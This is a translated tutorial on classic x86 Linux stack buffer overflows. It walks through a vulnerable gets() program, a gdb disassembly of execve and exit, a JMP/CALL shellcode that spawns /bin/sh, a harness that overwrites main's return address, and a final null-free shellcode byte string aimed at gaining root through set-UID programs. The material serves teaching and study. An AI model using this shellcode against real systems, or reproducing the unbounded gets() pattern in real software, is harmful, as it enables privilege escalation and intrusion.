Stack Overflow Techniques from Beginner to Advanced: How to Write Shellcode

Last Update: 2013-12-14 Source: Internet

Author: User


Although buffer overflows are hard to avoid entirely during program development, they pose a serious threat to the system. Because of the way the system works, an attacker who triggers an overflow can exploit it to obtain elevated privileges, up to root. This article therefore introduces stack overflow techniques in detail.

Before you start on stack overflows, you should understand Win32 assembly language and what the registers are and do, and you need basic knowledge of the stack and of memory allocation. Many computer books cover these topics, so I will only sketch the principles and focus on applications. You should also be familiar with Linux, because the examples in this lecture are developed on Linux.


1. First, a review of the basics

Physically, the stack is a contiguous region of memory. A program declares various variables: static and global variables live in the data segment and are loaded when the program starts running, while the program's dynamic (automatic) local variables are allocated on the stack.

In terms of operation, the stack is a last-in, first-out (LIFO) structure. It grows in the opposite direction to memory addresses: if we say memory addresses grow upward, the stack grows downward. A push decrements ESP by 4 (ESP = ESP - 4) and a pop increments it by 4 (ESP = ESP + 4). In other words, a value pushed earlier sits at a higher memory address than a value pushed later. Keep this in mind, because it is the theoretical foundation of stack overflows.

During a function call, the following are pushed onto the stack in order: the parameters, the return address, and EBP. If the function has local variables, space for them is then reserved on the stack. When the function finishes, these local variables go out of scope, but their contents are not cleared. When the function returns, EBP is popped, the stack pointer is restored to where it was at the call, and the return address is popped into EIP so that execution continues in the caller.

In C programs, arguments are pushed onto the stack in reverse order. For example, for func(a, b, c), the arguments are pushed as c, b, a. When they are read back, because the stack is last-in, first-out, a is at the top of the stack, followed by b and finally c. These are the basics of assembly language, and you must understand them before you begin.

2. Now let's see what a stack overflow is.

Stack allocation during runtime

A stack overflow occurs when more data is written into a buffer on the stack than the buffer can hold, without regard to its size. The data runs past the end of the buffer and overwrites older data on the stack.

For example, program 1:

#include <stdio.h>

int main(void)
{
    char name[8];
    printf("Please type your name: ");
    gets(name);    /* no bounds check: the flaw this article exploits */
    printf("Hello, %s!", name);
    return 0;
}

Compile and run it. Entering ipxodi prints "Hello, ipxodi!". How is the stack used while the program runs?

When main starts running, the return address and then EBP are pushed onto the stack.

Using gcc -S to get the assembly output, we can see that main begins with the following instructions:

pushl %ebp
movl %esp, %ebp
subl $8, %esp

It first saves EBP, then sets EBP equal to the current ESP so that EBP can be used to access this function's local variables. Next, it subtracts 8 from ESP, growing the stack by 8 bytes to hold the name[] array. Finally, when main returns, the return address (ret) is popped into EIP and the CPU continues with the instruction EIP points to.

Stack Overflow

Now run it again and enter ipxodiAAAAAAAAAAAAAAA. When gets(name) executes, the input string is too long for the name array, so the extra 'A' characters keep being written toward higher memory addresses. Because the stack grows in the opposite direction to memory, these 'A's overwrite older elements of the stack: the saved EBP and ret are both overwritten with 'A'. When main returns, the ASCII code of "AAAA", 0x41414141, is used as the return address. The CPU tries to execute the instruction at 0x41414141 and fails. This is a stack overflow.

3. How to exploit a stack overflow

We have now produced a stack overflow. The principle can be summarized as follows: because string-handling functions such as gets and strcpy do not check array bounds, we can write past the end of a character array, overwrite older values on the stack, and thereby modify the return address.

In the preceding example, this makes the CPU jump to an address that holds no valid instruction, so the program fails. In fact, once the stack overflows, we fully control what the program does next: if we overwrite the return address with the address of real instructions, the CPU will execute our instructions instead.

On UNIX/Linux, our instructions can execute a shell, which runs with the same privileges as the program whose stack we overflowed. If that program is set-UID root, we get a root shell. The next section describes how to write shellcode.

How to Write Shellcode

I. Analyzing the basic shellcode algorithm

In C, a program that starts a shell is written as follows:

shellcode.c

------------------------------------------------------------------------

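#include <unistd.h>    /* execve() */

int main(void) {
    char *name[2];

    name[0] = "/bin/sh";          /* program to run */
    name[1] = NULL;               /* argv must end with a NULL entry */
    execve(name[0], name, NULL);  /* only returns if it fails */
    return 0;
}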

------------------------------------------------------------------------

execve executes a program. It takes the address of the program name as its first argument; a pointer array holding the program's arguments argv[i], terminated by a NULL entry (argv[n-1] = 0), as its second argument; and (char *) 0 as its third argument.

Let's take a look at execve's assembly code:

[nkl10]$ gcc -o shellcode -static shellcode.c
[nkl10]$ gdb shellcode
(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>:    pushl %ebp
0x80002bd <__execve+1>:  movl %esp, %ebp         ; function prologue
0x80002bf <__execve+3>:  pushl %ebx              ; save ebx
0x80002c0 <__execve+4>:  movl $0xb, %eax         ; eax = 0xb, the system call number
0x80002c5 <__execve+9>:  movl 0x8(%ebp), %ebx    ; ebp+8: first argument, address of "/bin/sh\0"
0x80002c8 <__execve+12>: movl 0xc(%ebp), %ecx    ; ebp+12: second argument, address of the name array
0x80002cb <__execve+15>: movl 0x10(%ebp), %edx   ; ebp+16: third argument, the NULL pointer
                                                 ; (our shellcode will pass the address of name[1], whose content is NULL)
0x80002ce <__execve+18>: int $0x80               ; execute system call 0xb (execve)
0x80002d0 <__execve+20>: movl %eax, %edx         ; from here on: return-value handling, not needed
0x80002d2 <__execve+22>: testl %edx, %edx
0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42>
0x80002d6 <__execve+26>: negl %edx
0x80002d8 <__execve+28>: pushl %edx
0x80002d9 <__execve+29>: call 0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>: popl %edx
0x80002df <__execve+35>: movl %edx, (%eax)
0x80002e1 <__execve+37>: movl $0xffffffff, %eax
0x80002e6 <__execve+42>: popl %ebx
0x80002e7 <__execve+43>: movl %ebp, %esp
0x80002e9 <__execve+45>: popl %ebp
0x80002ea <__execve+46>: ret
0x80002eb <__execve+47>: nop
End of assembler dump.

From this analysis, execve reduces to the following simplified instruction sequence:

movl $<execve system call number>, %eax
movl $<address of "/bin/sh\0">, %ebx
movl $<address of the name array>, %ecx
movl $<address of name[n-1]>, %edx
int $0x80                                  ; execve

If execve succeeds, the process image of shellcode is replaced by /bin/sh, which then runs in its place, and none of the instructions after the system call are executed. If execve fails, however (for example, because there is no /bin/sh file), the CPU simply continues with whatever instructions follow, with unpredictable results. Therefore an exit() system call must follow, to end the execution of shellcode.c cleanly.

Now let's look at the assembly code for exit(0):

(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x800034c <_exit>:      pushl %ebp
0x800034d <_exit+1>:    movl %esp, %ebp
0x800034f <_exit+3>:    pushl %ebx
0x8000350 <_exit+4>:    movl $0x1, %eax          ; system call 1 (exit)
0x8000355 <_exit+9>:    movl 0x8(%ebp), %ebx     ; ebx = the argument, 0
0x8000358 <_exit+12>:   int $0x80                ; trigger the system call
0x800035a <_exit+14>:   movl 0xfffffffc(%ebp), %ebx
0x800035d <_exit+17>:   movl %ebp, %esp
0x800035f <_exit+19>:   popl %ebp
0x8000360 <_exit+20>:   ret
0x8000361 <_exit+21>:   nop
0x8000362 <_exit+22>:   nop
0x8000363 <_exit+23>:   nop
End of assembler dump.

The assembly for exit(0) is even simpler:

movl $0x1, %eax        ; system call 1 (exit)
movl $0x0, %ebx        ; ebx holds the exit status 0
int $0x80              ; trigger the system call

Putting the two together gives:

movl $<execve system call number>, %eax
movl $<address of "/bin/sh\0">, %ebx
movl $<address of the name array>, %ecx
movl $<address of name[n-1]>, %edx
int $0x80              ; execve
movl $0x1, %eax        ; system call 1 (exit)
movl $0x0, %ebx        ; ebx holds the exit status 0
int $0x80              ; execute the system call (exit)

II. Implementing the shellcode

Now let's implement this algorithm. First we need the string "/bin/sh" and a name array. We can construct both, but how do we know their addresses inside the shellcode? Each time a program is loaded, the addresses of the string and the name array are not fixed. Hackers cleverly solved this problem with a combination of JMP and CALL.

------------------------------------------------------------------------

jmp    offset-to-call               # 2 bytes  // jump forward to the call
popl   %esi                         # 1 byte   // pop the string address
movl   %esi, array-offset(%esi)     # 3 bytes  // build the name array at string+8; name[0] = string address
movb   $0x0, nullbyteoffset(%esi)   # 4 bytes  // put 0 at string+7 to terminate the string
movl   $0x0, null-offset(%esi)      # 7 bytes  // name[1] = 0
movl   $0xb, %eax                   # 5 bytes  // eax = 0xb, the execve syscall number
movl   %esi, %ebx                   # 2 bytes  // ebx = address of the string
leal   array-offset(%esi), %ecx     # 3 bytes  // ecx = start address of the name array
leal   null-offset(%esi), %edx      # 3 bytes  // edx = address of name[1]
int    $0x80                        # 2 bytes  // int 0x80 is the system call
movl   $0x1, %eax                   # 5 bytes  // eax = 0x1, the exit syscall number
movl   $0x0, %ebx                   # 5 bytes  // ebx = 0, the exit status
int    $0x80                        # 2 bytes  // int 0x80 is the system call
call   offset-to-popl               # 5 bytes  // placed here, so the string address is pushed as the return address
/bin/sh string goes here

------------------------------------------------------------------------

First, a relative JMP jumps to the CALL. When the CALL executes, the address of the string /bin/sh that follows it is pushed onto the stack as the call's return address. Execution then continues at popl %esi, which pops that return address off the stack, giving us the real address of the string. Next, a 0 is written to the byte just after "/bin/sh" (string+7) to terminate the string, and the following 8 bytes are used to build the name array as two 4-byte integers.

Now we can write the shellcode, starting with the assembly source.

shellcodeasm.c

------------------------------------------------------------------------

int main(void) {
    __asm__(
        "jmp 0x2a\n\t"                  /* 2 bytes */
        "popl %esi\n\t"                 /* 1 byte  */
        "movl %esi, 0x8(%esi)\n\t"      /* 3 bytes */
        "movb $0x0, 0x7(%esi)\n\t"      /* 4 bytes */
        "movl $0x0, 0xc(%esi)\n\t"      /* 7 bytes */
        "movl $0xb, %eax\n\t"           /* 5 bytes */
        "movl %esi, %ebx\n\t"           /* 2 bytes */
        "leal 0x8(%esi), %ecx\n\t"      /* 3 bytes */
        "leal 0xc(%esi), %edx\n\t"      /* 3 bytes */
        "int $0x80\n\t"                 /* 2 bytes */
        "movl $0x1, %eax\n\t"           /* 5 bytes */
        "movl $0x0, %ebx\n\t"           /* 5 bytes */
        "int $0x80\n\t"                 /* 2 bytes */
        "call -0x2f\n\t"                /* 5 bytes */
        ".string \"/bin/sh\"\n\t"       /* 8 bytes */
    );
    return 0;
}

After compiling, use gdb's x/bx [address] command to dump the instructions as hexadecimal bytes.

Next, write the following test program (this is the basic harness for testing shellcode):

test.c

char shellcode[] =
    "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
    "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
    "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

int main(void) {
    int *ret;

    /* ret now points at main's return address: +2 skips the ret variable
       itself and the saved EBP (without the pushl %ebp, +1 would do). */
    ret = (int *)&ret + 2;
    /* Overwrite main's return address with the start address of shellcode. */
    (*ret) = (int)shellcode;
    return 0;
}

[nkl10]$ gcc -o test test.c
[nkl10]$ ./test
$ exit
[nkl10]$

In test.c the shellcode is stored in the shellcode array. Setting main's return address (ret) to the start of that array makes the program execute our shellcode when main returns, so we get a shell. The run above shows the shell prompt $, indicating that a shell was opened successfully.

Note that we placed the shellcode in a global variable, that is, in the data segment, rather than in the code segment. The operating system marks a program's code segment read-only, so it cannot be modified. Instructions such as movl %esi, 0x8(%esi) write into the shellcode's own bytes, so the shellcode cannot be placed in the code segment.

Is this shellcode good enough? Unfortunately, not quite. Recall that the key to a stack overflow is overflowing a string array. String-copying functions such as strcpy treat "\0" as the end of the string and stop writing when they reach it. Our shellcode contains many \0 bytes, so a copy made by such a function would stop at the first one and deliver only a fragment of the shellcode. Our shellcode therefore must not contain any \0 characters.

Therefore, some instructions must be replaced with equivalents that contain no zero bytes:

Old instructions                New instructions

movb $0x0, 0x7(%esi)            xorl %eax, %eax
movl $0x0, 0xc(%esi)            movb %al, 0x7(%esi)
                                movl %eax, 0xc(%esi)
--------------------------------------------------------
movl $0xb, %eax                 movb $0xb, %al
--------------------------------------------------------
movl $0x1, %eax                 xorl %ebx, %ebx
movl $0x0, %ebx                 movl %ebx, %eax
                                inc %eax
--------------------------------------------------------

The final shellcode is:

------------------------------------------------------------------------

char shellcode[] =
    "\xeb\x1f"              /* 00: jmp 0x1f              */
    "\x5e"                  /* 02: popl %esi             */
    "\x89\x76\x08"          /* 03: movl %esi, 0x8(%esi)  */
    "\x31\xc0"              /* 06: xorl %eax, %eax       */
    "\x88\x46\x07"          /* 08: movb %al, 0x7(%esi)   */
    "\x89\x46\x0c"          /* 0b: movl %eax, 0xc(%esi)  */
    "\xb0\x0b"              /* 0e: movb $0xb, %al        */
    "\x89\xf3"              /* 10: movl %esi, %ebx       */
    "\x8d\x4e\x08"          /* 12: leal 0x8(%esi), %ecx  */
    "\x8d\x56\x0c"          /* 15: leal 0xc(%esi), %edx  */
    "\xcd\x80"              /* 18: int $0x80             */
    "\x31\xdb"              /* 1a: xorl %ebx, %ebx       */
    "\x89\xd8"              /* 1c: movl %ebx, %eax       */
    "\x40"                  /* 1e: inc %eax              */
    "\xcd\x80"              /* 1f: int $0x80             */
    "\xe8\xdc\xff\xff\xff"  /* 21: call -0x24            */
    "/bin/sh";              /* 26: .string "/bin/sh"     */

This article is an English version of an article originally written in Chinese on aliyun.com.
